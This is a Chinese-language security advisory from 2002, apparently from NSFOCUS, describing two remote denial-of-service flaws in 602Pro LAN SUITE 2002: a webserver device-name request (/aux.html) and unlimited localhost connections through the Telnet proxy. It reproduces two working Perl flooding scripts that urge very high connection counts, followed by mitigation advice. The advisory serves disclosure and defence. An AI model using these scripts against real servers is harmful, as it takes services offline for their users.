首页 -> 安全研究

安全研究

安全漏洞
602Pro LAN SUITE 2002多个远程拒绝服务漏洞

发布日期:2002-08-05
更新日期:2002-08-08

受影响系统:
Software602 602Pro LAN SUITE 2002
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000
描述:
602Pro Lan Suite是一款Internet网络共享工具,支持电子邮件和传真,无限的用户代理服务器/firewall服务器、POP3/SMTP服务器、WWW服务器和DHCP服务器,可运行在Windows操作系统下。

602Pro Lan Suite的WWW服务器和Telnet代理存在漏洞,远程攻击者可以利用这些漏洞进行拒绝服务攻击。

问题一:Webserver/Webmail windows设备名拒绝服务攻击

Lan Suite的Webserver组件没有很好的过滤包含设备名文件的请求,攻击者请求"/aux.html",服务器就会尝试把设备作为文件读取,导致线程挂起,与此线程相关的内存和CPU不能释放。通过自动敛迹和和重复请求这样的文件,可使lansuite.exe快速消耗系统资源,导致拒绝服务。

问题二:Telnet代理存在拒绝服务攻击

Telnet代理允许无限制的通过代理连接Localhost,连续的进行通过代理连接Localhost请求,可导致lansuite.exe进程消耗大量资源,产生拒绝服务。

<*来源:Stan Bubrouski (stan@ccs.neu.edu
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102857693010512&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Stan Bubrouski(stan@ccs.neu.edu) 提供了如下测试程序:

#!/usr/bin/perl
#
# lansuite-proxy-DoS.pl - 602Pro LAN SUITE 2002 telnet proxy DoS
#
# Note: Try very high number of connections and run multiple instances
# of the script for quick results.
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan@ccs.neu.edu)


if (!$ARGV[2]) {
    print "Usage $0 <hostname> <port> <connections>\n\n";
    exit();
}

$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];


use Net::Telnet ();
$t = new Net::Telnet;
$t->open(Host => $host,Port => $port);

foreach(1...$numc) {
    $t->waitfor('/.*host.*/');
    $t->print('localhost:23');
}
["lansuite-webserver-DoS.pl" (text/plain)]

#!/usr/bin/perl
#
# lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS
#
# Note: Try using a connections setting of 100000+ for obvious results
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan@ccs.neu.edu)

use IO::Socket;

if (!$ARGV[2]) {
    print "Usage $0 <hostname> <port> <connections>\n\n";
    exit();
}

$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];


foreach(1...$numc) {
    $sock = IO::Socket::INET->new( PeerAddr => "$host", Proto => "tcp", PeerPort => "$port");
    print $sock "GET /aux.html HTTP/1.0\r\n";
}

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时停止使用WWW服务器和Telnet代理。

厂商补丁:

Software602
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.software602.com/products/ls/

浏览次数:3641
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障